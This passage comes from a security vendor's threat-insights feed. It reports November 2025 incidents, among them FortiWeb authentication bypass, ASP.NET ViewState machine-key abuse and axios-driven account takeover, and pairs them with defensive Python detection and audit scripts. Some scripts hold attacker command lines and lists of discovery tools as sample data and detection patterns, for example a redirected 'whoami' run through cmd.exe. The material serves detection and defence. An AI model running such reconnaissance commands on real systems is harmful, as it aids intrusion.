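the replay/hijack indicator described above."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)   # assumption: two countries inside this window is not plausible travel


def _ev(session, user, country, ip, when):
    return {"session_id": session, "user": user, "country": country, "ip": ip,
            "time": datetime.fromisoformat(when)}


# Constructed activity records; countries stand in for a geo-IP enrichment step.
SAMPLE_ACTIVITY = [
    _ev("sess-A", "victim@example.com", "GB", "203.0.113.5", "2025-12-03T10:00"),
    _ev("sess-A", "victim@example.com", "GB", "203.0.113.5", "2025-12-03T10:04"),
    _ev("sess-A", "victim@example.com", "NL", "198.51.100.77", "2025-12-03T10:07"),
    _ev("sess-A", "victim@example.com", "GB", "203.0.113.5", "2025-12-03T10:09"),
    _ev("sess-B", "colleague@example.com", "GB", "203.0.113.5", "2025-12-03T10:00"),
    _ev("sess-B", "colleague@example.com", "GB", "192.0.2.40", "2025-12-03T10:30"),
    _ev("sess-C", "traveller@example.com", "GB", "203.0.113.5", "2025-12-03T06:00"),
    _ev("sess-C", "traveller@example.com", "FR", "192.0.2.9", "2025-12-03T16:00"),
]


def first_conflict(evs, window):
    """First pair of events in one session from different countries inside the window."""
    for i, a in enumerate(evs):
        for b in evs[i + 1:]:
            if b["time"] - a["time"] > window:
                break
            if b["country"] != a["country"]:
                return a, b
    return None


def detect_shared_sessions(events, window=WINDOW):
    """One finding per session ID seen from two countries within the window."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e["session_id"]].append(e)
    findings = []
    for sid, evs in by_session.items():
        evs.sort(key=lambda e: e["time"])
        pair = first_conflict(evs, window)
        if pair:
            a, b = pair
            findings.append({"session_id": sid, "user": a["user"],
                             "countries": sorted({a["country"], b["country"]}),
                             "ips": sorted({a["ip"], b["ip"]}),
                             "gap_minutes": (b["time"] - a["time"]).total_seconds() / 60})
    return findings


if __name__ == "__main__":
    for f in detect_shared_sessions(SAMPLE_ACTIVITY):
        print(f)
```

sess-B moves between two IPs in the same country and sess-C changes country ten hours apart; neither is reported. Only sess-A, where the original holder keeps using the token while a second country appears in between, is flagged, which is the interleaved pattern that distinguishes a replayed token from a user who simply travelled.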

SecurityHQ’s Incident Response team shared tactical and strategic recommendations to prevent recurrence of similar incidents in future.


Managed Defense Threat Insights: November 2025 Newsletter
https://www.securityhq.com/blog/managed-defense-threat-insights-november-2025-newsletter/
Published Wed, 10 Dec 2025 10:20:06 +0000

The post Managed Defense Threat Insights: November 2025 Newsletter appeared first on SecurityHQ.

Cyber Defense Center

Threat Actor successfully probes PHP RCE payload towards website protected by AWS WAF & ALB

Detection: An incident-driven security assessment led to the detection of PHP RCE probing attempts against a non-PHP Nginx web server, disclosing and mitigating a critical security risk that allowed bypass of defense layers.

Description: While reviewing client’s security posture, SecurityHQ’s Incident Response team identified malicious traffic attempting to exploit a PHP Remote Code Execution (RCE) vulnerability against a web application hosted on Nginx, which does not run any PHP components. The attacker’s objective appeared to be reconnaissance — specifically, probing for server behavior and response codes. Because the affected webserver was not yet integrated with SIEM, initial 404 responses generated by Nginx were not visible to the Monitoring Team. A deeper investigation, combined with consultation with the application team, revealed that these 404 responses were originating from the web tier behind the AWS WAF and Application Load Balancer (ALB). 

Recommendations: To strengthen the overall security posture and reduce unnecessary traffic reaching the application backend, we recommended enabling all default AWS Managed Rule Groups within AWS WAF. These rule sets help block common exploit attempts—including PHP-based probes—at the edge, preventing them from being forwarded to the ALB and ultimately to the webserver. This proactive hardening step aligns with AWS best practices and significantly minimizes exposure to widespread vulnerability scanners and exploit attempts. 

Critical Vulnerability in Fortinet FortiWeb Exploited in the Wild

Detection: Critical FortiWeb Zero-Day Alert: Path Traversal Exploit Enables Remote Authentication Bypass

SHQ Detection Pack – Relevant Use Cases

  1. Suspicious Web Requests Identified in Audit, System Logs
  2. Administrative Logins to the management interface
  3. Configuration Changes Executed

Description: SecurityHQ’s Incident Response team successfully responded to the incident involving CVE-2025-64446 – a critical vulnerability impacting Fortinet’s FortiWeb Web Application Firewall. The issue combines a relative path traversal flaw with an authentication bypass, allowing remote, unauthenticated attackers to access internal management endpoints. As per the vendor, multiple FortiWeb versions are affected, including 7.0.0–7.0.11, 7.2.0–7.2.11, 7.4.0–7.4.9, 7.6.0–7.6.4, and 8.0.0–8.0.1, as confirmed by FortiGuard Labs and CISA. Exploitation requires no valid credentials. Attackers can send crafted HTTP(S) requests that leverage the path traversal weakness to reach protected CGI components on the management interface. Successful exploitation enables complete authentication bypass, allowing threat actors to create new administrative accounts and gain full control of the FortiWeb device. This poses a significant risk to environments relying on FortiWeb as a frontline security control.

Mitigation Actioned:

  • Restricted management access to trusted internal networks only.
  • Keys, credentials and certificates were rotated.

Lessons Learnt: Organizations should have a strong proactive patching regime, restrict management access to internal networks, and enable key WAF protections to block exploitation attempts. Post-patch, review admin accounts and logs for unauthorized activity and ensure full SIEM visibility for ongoing monitoring.

Threat Detection Engineering

Key Detection Engineering Highlights for November

Azure Hound Probes

Threat actors widely use Azure Hound or similar tools to map users, groups, and roles within Microsoft 365 or Entra ID as part of early enumeration. It is often used by red teamers to identify gaps in cloud security. Here is a short example of this attack method: a low-privilege account suddenly produces a burst of sign-ins from an unusual application pattern.

The tool rapidly queries directory information, attempting to identify privileged roles, access paths, and high-value accounts.

Why it matters: This type of reconnaissance helps attackers understand your cloud environment, find weak points, and plan privilege escalation. Detecting these early signals reduces the chance of further compromise.

Rule Name: Azure Hound User Agent Detected (P2)

Detection Scope: Microsoft 365 and Entra ID

Rationale: Reconnaissance tools generate directory queries and sign-in patterns that differ from normal user activity. Identifying these anomalies allows early detection before attackers escalate privileges or move deeper into the environment.

BloodHound – Behavioral Detection:

An attacker runs a BloodHound/SharpHound collector from a compromised workstation to rapidly enumerate Active Directory. BloodHound enumeration creates rapid, large-scale directory queries that differ from normal user or admin behavior. Tracking abnormal spikes in object-access events helps identify reconnaissance before privilege escalation or lateral movement occurs.

Here is a short example of this Attack method: Host XYZ generated 2,400 “Failure Audit: An operation was performed on an object” events in 45 seconds, each referencing different AD objects (users/groups/ACLs). The source account was a low-privilege user (not a well-known service account) and the requests targeted many high-value OUs.

Why it matters: BloodHound-style enumeration reveals relationships, privileges, and ACEs that attackers use to plan lateral movement and privilege escalation.

Rule Name: Excessive Directory Access Failures Detected (P3)

Detection Scope: Monitor Windows Security audit logs for spikes in object-access events (success & failure) indicating mass AD enumeration; surface SourceHost, Username, and TargetObject; exclude known service/admin accounts.
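The spike logic in this rule, and the read-heavy LDAP reconnaissance described in the December pentest-season section, both come down to one measurement: how many distinct directory objects one (host, account) pair touches inside a short window. The following Python is an added example of that measurement over Security event 4662 records and is not SecurityHQ's rule; the threshold, the excluded accounts and the sample bursts are constructed, and SourceHost is assumed to have been joined onto each event from the logon session by the SIEM, since 4662 itself does not carry it.

```python
"""Spike detection for mass Active Directory enumeration over Security event 4662
("An operation was performed on an object")."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)
THRESHOLD = 200                          # assumption: distinct objects per window beyond any interactive user
EXCLUDED_ACCOUNTS = {"svc-ldap-sync"}    # assumption: service/admin accounts with legitimate bulk reads
BASE = datetime(2025, 11, 20, 14, 0, 0)


def _burst(host, user, count, seconds):
    """Constructed 4662 events: `count` distinct objects touched evenly over `seconds`."""
    step = timedelta(seconds=seconds / count)
    return [{"EventID": 4662, "TimeCreated": BASE + i * step, "SourceHost": host,
             "SubjectUserName": user,
             "ObjectName": f"CN=obj{i},OU=Corp,DC=example,DC=com"} for i in range(count)]


SAMPLE_EVENTS = (_burst("WSXYZ", "lowpriv", 300, 40)           # collector run from a workstation
                 + _burst("ADMIN01", "svc-ldap-sync", 250, 40)  # known sync account, excluded
                 + _burst("WS02", "bob", 15, 40))               # ordinary user browsing the address book


def detect_directory_enumeration(events, window=WINDOW, threshold=THRESHOLD,
                                 excluded=EXCLUDED_ACCOUNTS):
    """One finding per (host, user) whose distinct-object count in any window crosses the threshold."""
    streams = defaultdict(list)
    for e in events:
        if e["EventID"] == 4662 and e["SubjectUserName"].lower() not in excluded:
            streams[(e["SourceHost"], e["SubjectUserName"])].append(e)
    findings = []
    for (host, user), evs in streams.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        best, start = None, 0
        for end in range(len(evs)):
            while evs[end]["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1
            objects = {e["ObjectName"] for e in evs[start:end + 1]}
            if len(objects) >= threshold and (best is None or len(objects) > best["distinct_objects"]):
                span = evs[end]["TimeCreated"] - evs[start]["TimeCreated"]
                best = {"source_host": host, "user": user, "distinct_objects": len(objects),
                        "events": end - start + 1, "seconds": round(span.total_seconds(), 1)}
        if best:
            findings.append(best)
    return findings


if __name__ == "__main__":
    for f in detect_directory_enumeration(SAMPLE_EVENTS):
        print(f)
```

Counting distinct objects rather than raw events is deliberate: a user repeatedly opening the same few objects generates volume but not breadth, while a collector touches each object once and moves on.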

Threat Management

SecurityHQ’s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. The following section highlights some key security insights.

Account Takeover! Sign-In Activity from malicious useragent “axios/1.13.1”

Detection: The incident trigger was a suspicious user authentication activity with unfamiliar sign-in properties and a detected password spray attack. The alert identified potential unauthorized access attempts originating from an unusual IP address and nonstandard client application.

Investigation: Identity Protection detected an unusual interactive sign-in for the user account originating from an external IP address in the USA. The authentication was performed using the atypical user agent “axios/1.13.1”, a tool commonly used for automated HTTP requests rather than legitimate browser-based logins.

Multiple aspects of the authentication, including ASN, browser type, device fingerprint, geographic location, and tenant IP subnet, were all inconsistent with the user’s typical login patterns from the user's location and device, making the activity highly anomalous. Although MFA was successfully completed via text message to the registered number, the abnormal client and unfamiliar sign-in characteristics raised concerns regarding potential credential compromise or account takeover.

Subsequent activity from the account included a suspicious URL click event leading to a OneDrive resource. Sandbox analysis confirmed the link redirected to a OneDrive login page, indicative of phishing intent. The URL originated from “cable[.]coromans[.]com”, a domain active since 2010 but potentially abused for malicious purposes. Additionally, a concurrent password spray detection targeting multiple accounts suggested broader credential-stuffing attempts in the environment. Based on these findings, the activity aligns with MITRE ATT&CK T1110 (Brute Force) under TA0001 – Initial Access, consistent with threat actors attempting unauthorized entry via automated or scripted authentication attempts. 

Actions taken: A major incident was raised, and the customer was notified over the phone. Immediate remediation steps were applied to the user’s account, and the identified IOCs were blocked by the SecurityHQ Team under the Managed EDR Service.

Reference: https://www.securityhq.com/blog/adaptive-defense-how-cloud-app-policies-can-block-malicious-user-agents/

Throughout 2025, the SecurityHQ Team raised 300+ major incidents originating from this axios user agent and was successful in preventing further damage in all cases.
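The sign-in properties that made this case anomalous (a non-browser user agent together with an unfamiliar ASN, country and device, with MFA having passed anyway) can be scored against a user's own recent history. The following Python is an added example, not the identity-protection logic or the cloud app policy the referenced blog describes; the baseline history, the candidate sign-ins, the automation user-agent list and the score weights are constructed assumptions, while "axios/1.13.1" is the user agent from the case above.

```python
"""Score a sign-in against the user's recent baseline; a non-browser user agent such as
axios counts heavily, and a passed MFA challenge does not lower the score."""
import re
from collections import defaultdict

AUTOMATION_UA = re.compile(r"^(axios|python-requests|curl|okhttp|go-http-client|node-fetch)/", re.I)
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0 Safari/537.36"


def _signin(user, ua, ip, asn, country, device, mfa):
    return {"user": user, "userAgent": ua, "ip": ip, "asn": asn, "country": country,
            "deviceId": device, "mfa": mfa}


# Constructed 30-day history for one user (normally the identity provider's sign-in log).
HISTORY = [_signin("alice@example.com", BROWSER_UA, "192.0.2.10", "AS64500", "GB",
                   "dev-alice-laptop", "success") for _ in range(20)]
HISTORY.append(_signin("alice@example.com", BROWSER_UA, "192.0.2.11", "AS64500", "GB",
                       "dev-alice-phone", "success"))

# Constructed candidates to triage.
CANDIDATES = [
    _signin("alice@example.com", "axios/1.13.1", "198.51.100.23", "AS64501", "US", "unknown", "success"),
    _signin("alice@example.com", BROWSER_UA, "192.0.2.10", "AS64500", "GB", "dev-alice-laptop", "success"),
    _signin("alice@example.com", BROWSER_UA, "203.0.113.40", "AS64502", "FR", "dev-alice-phone", "success"),
    _signin("bob@example.com", BROWSER_UA, "192.0.2.20", "AS64500", "GB", "dev-bob-laptop", "success"),
]


def build_baseline(history):
    """Per-user sets of ASNs, countries and device IDs seen in the history."""
    base = defaultdict(lambda: {"asn": set(), "country": set(), "deviceId": set()})
    for s in history:
        for k in ("asn", "country", "deviceId"):
            base[s["user"]][k].add(s[k])
    return base


def score_signin(s, baseline):
    """Return (score, reasons); 3 points for an automation client, 1 per unfamiliar property."""
    score, reasons = 0, []
    if AUTOMATION_UA.match(s["userAgent"]):
        score += 3
        reasons.append(f"non-browser user agent: {s['userAgent']}")
    profile = baseline.get(s["user"])
    if profile is None:
        score += 1
        reasons.append("no baseline for user")
    else:
        for k in ("asn", "country", "deviceId"):
            if s[k] not in profile[k]:
                score += 1
                reasons.append(f"unfamiliar {k}: {s[k]}")
    # The MFA result is carried for the analyst but deliberately not subtracted:
    # the case above completed SMS MFA and was still an account takeover.
    return score, reasons


def triage(signins, baseline, threshold=4):
    flagged = []
    for s in signins:
        score, reasons = score_signin(s, baseline)
        if score >= threshold:
            flagged.append({"user": s["user"], "ip": s["ip"], "mfa": s["mfa"],
                            "score": score, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for f in triage(CANDIDATES, build_baseline(HISTORY)):
        print(f["user"], f["ip"], f["score"], "; ".join(f["reasons"]))
```

The third candidate (a known phone from a new country) scores 2 and is left alone, which is the kind of travel a baseline should tolerate; the axios sign-in scores 6 because the client itself is the strongest single signal, before any of the location properties are considered.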

Suspicious Remote Command Execution and Lateral Movement Activity.

Detection: An incident was escalated indicating suspicious lateral movement activity and remote command execution on device. The alert identified ‘SuspRemoteCmdCommand’ malware associated with WMI process execution originating from an external IP address. 

Investigation: Microsoft Defender for Endpoint (MDE) detected suspicious WMI-related activity involving the legitimate WmiPrvSE.exe process executed with the unusual command line “-secured -Embedding”. Although WmiPrvSE.exe is commonly used by Windows, the behavior was flagged due to the associated detection of SuspRemoteCmdCommand, suggesting potential remote command execution.

Shortly afterward, a secondary process executed via cmd.exe, running quietly to capture the output of the whoami command to a temporary file—an action typically associated with attacker reconnaissance following lateral movement. The event also correlated with a prior Lateral Movement Detected alert on the same host, reinforcing concerns of unauthorized remote execution.

During behavior monitoring, the threat was identified and terminated promptly. This active threat was classified as Behavior:Win32/SuspRemoteCmdCommand.SA operating within the WmiPrvSE.exe process.

Additional telemetry captured WUDFHost.exe activity in the same timeframe, indicating possible chained system operations triggered during the malicious sequence. Threat intelligence enrichment further validated the risk indicators, as the external IP and associated file hash were flagged by multiple security sources, supporting Defender’s classification of the activity as malicious.

Remediation Actions: The malicious process was successfully blocked and terminated by Microsoft Defender. No further suspicious activity was observed. All identified IOCs were blocked. A full antivirus scan was performed on the entire host to ensure no residual malware components remained active.

Not many security solutions are able to log command line activity. Having an enterprise EDR solution or a command line auditing tool such as Sysmon enables defenders and analysts to detect activity happening under the hood.
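As an added illustration (not code from the incident or from SecurityHQ), the following Python script runs the two checks described above over constructed Sysmon Event ID 1 records: the WMI provider host spawning a shell, and a discovery command whose output is redirected to a file. Field names follow Sysmon's process-creation event; the sample paths and the WUDFHost GUID are made up.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1 (process creation) records modelled on the
# WmiPrvSE.exe -> cmd.exe -> whoami sequence described above. Paths and
# values are examples, not telemetry from the incident.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> C:\Windows\Temp\out.tmp 2>&1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c whoami"},
    {"Image": r"C:\Windows\System32\WUDFHost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\WUDFHost.exe -HostGUID:{00000000-0000-0000-0000-000000000000}"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Binaries commonly run for host/user discovery right after a foothold.
RECON_BINARIES = {"whoami", "hostname", "systeminfo", "ipconfig", "nltest",
                  "net", "quser", "tasklist"}
# stdout/stderr redirected into a file: "> x.txt", "1> x.txt", ">> x.txt"
REDIRECT_RE = re.compile(r"(?:^|\s)[12]?>{1,2}\s*\S+")


def basename(path: str) -> str:
    """Lower-case file name of a Windows path (ntpath accepts both slash styles)."""
    return ntpath.basename(path).lower()


def first_recon_binary(cmdline: str):
    """Return the first discovery tool named on the command line, if any."""
    for token in cmdline.split():
        name = basename(token)
        if name.endswith(".exe"):
            name = name[:-4]
        if name in RECON_BINARIES:
            return name
    return None


def evaluate(event: dict) -> list:
    """Rules that fire on a single process-creation event."""
    rules = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmdline = event["CommandLine"]

    # Rule 1: the WMI provider host spawning a shell. "-secured -Embedding" is
    # WmiPrvSE.exe's normal command line; the signal is the child it spawns.
    # Management agents also spawn children from WmiPrvSE.exe, so baseline
    # the parent/child pairs seen in your estate before alerting on this alone.
    if parent == "wmiprvse.exe" and image in SHELLS:
        rules.append("wmi_spawned_shell")

    # Rule 2: a discovery command whose output is written to a file, the
    # pattern used to collect results from a remotely executed command.
    recon = first_recon_binary(cmdline)
    if recon and REDIRECT_RE.search(cmdline):
        rules.append("recon_output_redirected")
    return rules


def detect(events: list) -> list:
    """Return one finding per event that fired at least one rule."""
    findings = []
    for index, event in enumerate(events):
        rules = evaluate(event)
        if rules:
            findings.append({
                "index": index,
                "image": basename(event["Image"]),
                "rules": rules,
                # Both rules on one event match the remote-exec-then-recon chain.
                "severity": "high" if len(rules) == 2 else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```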

Threat Hunting

SecurityHQ’s Threat Hunting team focused on hunting threats in the cloud, where malicious or unauthorized activity within the cloud environment mainly results from compromised credentials, misconfigured permissions, or exploitation of vulnerable services, leading to potential privilege escalation, lateral movement, and data exfiltration.

The objective of these hypotheses is to proactively detect, investigate, and respond to suspicious or unauthorized activities across cloud infrastructure that may indicate compromise, privilege escalation, data exfiltration, or other malicious behaviors, thereby reducing risk exposure and improving cloud security posture.

Notable Observations: Large-Scale Role Assumption & Privilege Probing: One of the customer environments showed an extremely high volume of AssumeRole operations, hinting at automation or scripted enumeration.

Key Observations:

  • Unknown external IPs performing API calls with repeated access denials.
  • Attempts to access sensitive resources or enumerate services.
  • Occasional rate-throttling events tied to high-volume API activity, suggesting automation.

Associated Risk: Likely indicators of scripted scanning, misconfigured integrations, or malicious reconnaissance.

EC2 & Compute Irregularities: Most environments showed no compute-based compromise activity, but a minority revealed abnormalities.

Key Observations:

  • Large EC2 instances running unexpectedly.
  • Rate-limiting and throttling events associated with compute services.

Associated Risks: No confirmed persistence, but compute resources are being probed or misused in some tenants.
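An added example, not SecurityHQ's own hunting tooling: a Python hunt over constructed CloudTrail records that flags source IPs showing the three observations above (AssumeRole bursts, repeated AccessDenied errors and throttling). The thresholds, IPs, account id and ARNs are assumptions chosen for the sample.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Hunt thresholds (assumptions); tune them per tenant from a baseline.
BURST_WINDOW = timedelta(minutes=5)
BURST_MIN_ASSUME_ROLE = 20   # AssumeRole calls from one IP inside BURST_WINDOW
DENIED_MIN_COUNT = 5         # AccessDenied errors from one IP before we care


def make_sample_log() -> str:
    """Constructed CloudTrail log file content (the "Records" array) as JSON.

    198.51.100.23 is an unknown external IP that fires 40 AssumeRole calls in
    two minutes, is denied on Secrets Manager reads and gets throttled by EC2;
    203.0.113.5 is a normal pipeline. IPs, ARNs and the account id are made up.
    """
    t0 = datetime(2025, 12, 3, 10, 0, 0)
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    who = {"arn": "arn:aws:iam::111122223333:user/svc-legacy"}
    records = []
    for i in range(40):
        records.append({"eventTime": (t0 + timedelta(seconds=3 * i)).strftime(fmt),
                        "eventSource": "sts.amazonaws.com", "eventName": "AssumeRole",
                        "sourceIPAddress": "198.51.100.23", "userIdentity": who})
    for i in range(10):
        records.append({"eventTime": (t0 + timedelta(minutes=3, seconds=i)).strftime(fmt),
                        "eventSource": "secretsmanager.amazonaws.com",
                        "eventName": "GetSecretValue", "sourceIPAddress": "198.51.100.23",
                        "errorCode": "AccessDenied", "userIdentity": who})
    records.append({"eventTime": "2025-12-03T10:04:00Z", "eventSource": "ec2.amazonaws.com",
                    "eventName": "DescribeInstances", "sourceIPAddress": "198.51.100.23",
                    "errorCode": "Client.RequestLimitExceeded", "userIdentity": who})
    for i in range(3):
        records.append({"eventTime": (t0 + timedelta(hours=i)).strftime(fmt),
                        "eventSource": "sts.amazonaws.com", "eventName": "AssumeRole",
                        "sourceIPAddress": "203.0.113.5",
                        "userIdentity": {"arn": "arn:aws:iam::111122223333:role/ci-deploy"}})
    return json.dumps({"Records": records})


def parse_time(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def max_in_window(times: list, window: timedelta) -> int:
    """Largest number of timestamps that fall inside any sliding window."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def hunt(log_json: str) -> list:
    """One finding per source IP that shows a burst, repeated denials or throttling."""
    per_ip = defaultdict(lambda: {"total": 0, "denied": 0, "throttled": 0,
                                  "assume_role_times": [], "identities": set()})
    for rec in json.loads(log_json)["Records"]:
        s = per_ip[rec["sourceIPAddress"]]
        s["total"] += 1
        s["identities"].add(rec.get("userIdentity", {}).get("arn", "?"))
        err = rec.get("errorCode", "")
        if err == "AccessDenied":
            s["denied"] += 1
        # Throttling is reported under service-specific names, e.g. EC2's
        # Client.RequestLimitExceeded or ThrottlingException for other services.
        if "Throttl" in err or "RequestLimitExceeded" in err:
            s["throttled"] += 1
        if rec["eventName"] == "AssumeRole":
            s["assume_role_times"].append(parse_time(rec["eventTime"]))

    findings = []
    window_minutes = int(BURST_WINDOW.total_seconds() // 60)
    for ip, s in per_ip.items():
        reasons = []
        burst = max_in_window(s["assume_role_times"], BURST_WINDOW)
        if burst >= BURST_MIN_ASSUME_ROLE:
            reasons.append(f"assume_role_burst:{burst}/{window_minutes}min")
        if s["denied"] >= DENIED_MIN_COUNT:
            reasons.append(f"repeated_access_denied:{s['denied']}/{s['total']}")
        if s["throttled"]:
            reasons.append(f"throttled:{s['throttled']}")
        if reasons:
            findings.append({"ip": ip, "identities": sorted(s["identities"]),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in hunt(make_sample_log()):
        print(finding)
```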

Recommendations: Based on the combined threat landscape observed across all customers, the following global recommendations apply:

  • Enforce Strong Authentication Immediately.
  • Remove legacy IAM accounts where possible.
  • Restrict console access by IP through IAM conditions or network controls.
  • Harden IAM Roles & Reduce Privilege Exposure.
  • Limit access to Secrets Manager and KMS to essential roles only.
  • Lock Down S3 Storage by enabling Block Public Access globally.
  • Conduct a Global Access Key Audit.

Incident Response – Success Story

Incident Story: ASP.NET Machine Key Exploitation

One of SecurityHQ’s customers recently faced a critical web server compromise originating from a longstanding vulnerability in Microsoft’s ASP.NET framework. Threat actors have begun weaponizing publicly exposed ASP.NET machine keys, some of which have been available online since as early as 2003, to hijack Internet Information Services (IIS) servers and deploy malicious modules.

IR Observations: Attack Narrative

During the investigation, it was discovered that threat actors exploited ASP.NET ViewState deserialization flaws. By obtaining publicly available machine keys, they could tamper with serialized ViewState data, a component used to maintain state information across web requests. Because these machine keys are the cryptographic secrets that validate and secure ViewState content, possessing them effectively allowed the attackers to bypass ViewState MAC validation and execute arbitrary code on the targeted servers, all without requiring authentication credentials.

Microsoft had previously identified over 3,000 exposed machine keys across open repositories, forums, and developer sites, creating a wide landscape of potential victims. Many of these keys belonged to applications built on .NET Framework versions prior to 4.5, which lack built-in protection against deserialization abuse. 

Impact Analysis

Once the IIS servers were compromised, attackers loaded malicious IIS modules to maintain persistence and intercept incoming HTTP requests. These modules enabled:

  • Command execution under IIS worker process privileges.
  • Credential harvesting from memory and web traffic.
  • Data exfiltration through legitimate web communications.
  • Possible lateral movement within the network via trusted server accounts.

The stealth of this method made detection difficult, as all activities appeared as legitimate IIS traffic and processes.

Root Cause

  • Use of outdated ASP.NET versions (< 4.5) lacking secure ViewState handling.
  • Disabled or weak MAC validation for ViewState integrity.
  • Reuse or exposure of machine keys in public repositories and code-sharing platforms.

Conclusion

The exploitation of legacy ASP.NET vulnerabilities through leaked machine keys highlights the persistent risk posed by long-standing insecure configurations and public code exposure. By promptly rotating keys, enabling validation, and upgrading to modern frameworks with AMSI support, an organisation can restore the integrity of its web applications and prevent future exploitation of this vector.
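As an added example (not the customer's configuration or Microsoft's tooling), this Python script audits a constructed web.config for the three root causes listed above and produces a hardened copy with a freshly generated machineKey. The placeholder key values and the severity labels are assumptions; the key sizes follow the HMACSHA256 (64 bytes) and AES (32 bytes) settings.

```python
import secrets
import xml.etree.ElementTree as ET

# Constructed web.config showing the three root causes: a pre-4.5 target
# framework, ViewState MAC validation switched off, and a static machineKey using
# legacy algorithms. The key values are placeholders, not real leaked keys.
WEAK_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <compilation targetFramework="4.0" />
    <pages enableViewStateMac="false" />
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY_0000000000000000000000000000"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY_000000"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>
"""

WEAK_VALIDATION = {"MD5", "SHA1", "3DES"}
WEAK_DECRYPTION = {"DES", "3DES"}


def framework_version(root) -> tuple:
    """targetFramework as (major, minor); (2, 0) when absent, as in pre-4.0 configs."""
    comp = next(root.iter("compilation"), None)
    raw = comp.get("targetFramework") if comp is not None else None
    if not raw:
        return (2, 0)
    parts = raw.lstrip("v").split(".")
    return (int(parts[0]), int(parts[1]) if len(parts) > 1 else 0)


def audit(web_config: str) -> list:
    """Return findings as dicts with id, severity and detail."""
    root = ET.fromstring(web_config)
    findings = []

    if framework_version(root) < (4, 5):
        findings.append({"id": "legacy_framework", "severity": "high",
                         "detail": "targetFramework below 4.5; upgrade the application"})

    pages = next(root.iter("pages"), None)
    # enableViewStateMac defaults to true when the attribute is absent.
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append({"id": "mac_disabled", "severity": "critical",
                         "detail": "ViewState MAC validation disabled; forged ViewState is accepted"})

    mk = next(root.iter("machineKey"), None)
    if mk is not None:
        if mk.get("validation", "HMACSHA256").upper() in WEAK_VALIDATION:
            findings.append({"id": "weak_validation_algorithm", "severity": "high",
                             "detail": f"validation={mk.get('validation')}; use HMACSHA256"})
        if mk.get("decryption", "AES").upper() in WEAK_DECRYPTION:
            findings.append({"id": "weak_decryption_algorithm", "severity": "high",
                             "detail": f"decryption={mk.get('decryption')}; use AES"})
        # A static key is not wrong in itself (web farms need one), but it must be
        # unique to this application and rotated if it was ever committed or pasted.
        if "AutoGenerate" not in mk.get("validationKey", "AutoGenerate"):
            findings.append({"id": "static_machine_key", "severity": "info",
                             "detail": "static key present: confirm it was never published; rotate if unsure"})
    return findings


def new_machine_key() -> dict:
    """Fresh random keys: 64 bytes for HMACSHA256 validation, 32 bytes for AES."""
    return {"validationKey": secrets.token_hex(64).upper(),
            "decryptionKey": secrets.token_hex(32).upper(),
            "validation": "HMACSHA256", "decryption": "AES"}


def harden(web_config: str) -> str:
    """Re-enable MAC validation and rotate the machineKey. The framework upgrade
    is a code change, so targetFramework is left for the developers."""
    root = ET.fromstring(web_config)
    pages = next(root.iter("pages"), None)
    if pages is not None:
        pages.set("enableViewStateMac", "true")
    mk = next(root.iter("machineKey"), None)
    if mk is None:
        mk = ET.SubElement(next(root.iter("system.web")), "machineKey")
    for attr, value in new_machine_key().items():
        mk.set(attr, value)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for finding in audit(WEAK_WEB_CONFIG):
        print(finding)
    print(harden(WEAK_WEB_CONFIG))
```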

Reference: https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/

Adaptive Defense: How Cloud App Policies Can Block Malicious User Agents
https://www.securityhq.com/blog/adaptive-defense-how-cloud-app-policies-can-block-malicious-user-agents/ (Mon, 16 Jun 2025 09:57:58 +0000)

Overview: Microsoft 365 Apps

Many organizations seek to block malicious user agents and prevent scripted or unauthorized programmatic access to Microsoft 365. Adversary-in-the-Middle (AiTM) attacks are on the rise, allowing attackers to intercept and forward authentication traffic in real time, even circumventing multi-factor authentication (MFA). A significant development is the adoption of malicious user agents, such as Axios, a JavaScript-based HTTP client, which attackers use to replicate browser activity and take over user sessions.

With these tools, attackers can:

  • Automate the collection of credentials and replay of sessions
  • Bypass basic browser fingerprinting techniques
  • Launch large-scale attacks with minimal manual effort

Although detection strategies like monitoring user-agent strings or identifying unusual geolocation patterns are available, there is a lack of comprehensive guidance on countering these specific threats. Conventional security measures often fail to detect axios-driven requests that closely resemble genuine user actions.

As a result, organizations are exposed to risks including:

  • Session hijacking, even when MFA is enabled
  • Challenges in distinguishing automated agents from real users
  • Ongoing unauthorized access after initial authentication

This blog underscores the urgent need to block malicious user agents through adaptive session policies and advanced behavior-based security in Microsoft 365.

Prerequisites

Requirement: Description

